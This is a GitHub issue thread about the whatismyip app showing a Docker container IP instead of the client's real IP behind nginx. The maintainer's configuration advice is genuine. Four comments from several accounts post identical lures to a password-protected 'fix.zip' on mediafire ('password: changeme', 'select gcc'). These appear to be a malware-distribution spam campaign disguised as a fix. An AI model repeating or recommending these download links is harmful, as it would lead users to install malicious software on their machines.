### ISSUE TITLE
run in docker, got a container ip

### ISSUE THREAD

**Issue by borgle** [dcarrillo/whatismyip#37]
I got a container ip if i run this app in docker.  my real outer ip  in X-Forwarded-For section. how can i fix, is there some setting?

**Comment by dcarrillo** [comment]
Hi, not sure what your whole scenario is, but a few things to keep in mind:

* `X-Forwarded-For` is not honored for `whatismyip` to get the real IP of the client (although you can dump the headers).
* If you are behind a proxy, you can configure your proxy to put the real IP in a trusted header (you can configure the proxy to honor `X-Forwarded-For`, but again it can be a spoofed IP), and then configure `whatismyip` with the `-trusted-header <header name>` flag to honor that header.
* If you are running `whatismyip` in a container without a proxy behind it, you can run the container in `host` mode.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by borgle** [comment]
> Hi, not sure what your whole scenario is, but a few things to keep in mind:
> 
> * `X-Forwarded-For` is not honored for `whatismyip` to get the real IP of the client (although you can dump the headers).
> * If you are behind a proxy, you can configure your proxy to put the real IP in a trusted header (you can configure the proxy to honor `X-Forwarded-For`, but again it can be a spoofed IP), and then configure `whatismyip` with the `-trusted-header <header name>` flag to honor that header.
> * If you are running `whatismyip` in a container without a proxy behind it, you can run the container in `host` mode.

I deploy the project using docker. and -p 3000:8080 , the https service on nginx, using prox_pass to 3000.  when i visited this app, the ip show 172.10.0.1, this is my docker contianer internal ip.

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dcarrillo** [comment]
So, you need to configure nginx to pass a trusted header, something like:

```nginx
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Real-Port $remote_port;
    proxy_pass       http://127.0.0.1:3000;
```

and then use the flag I mentioned

`-trusted-header X-Real-IP -trusted-port-header X-Real-Port`
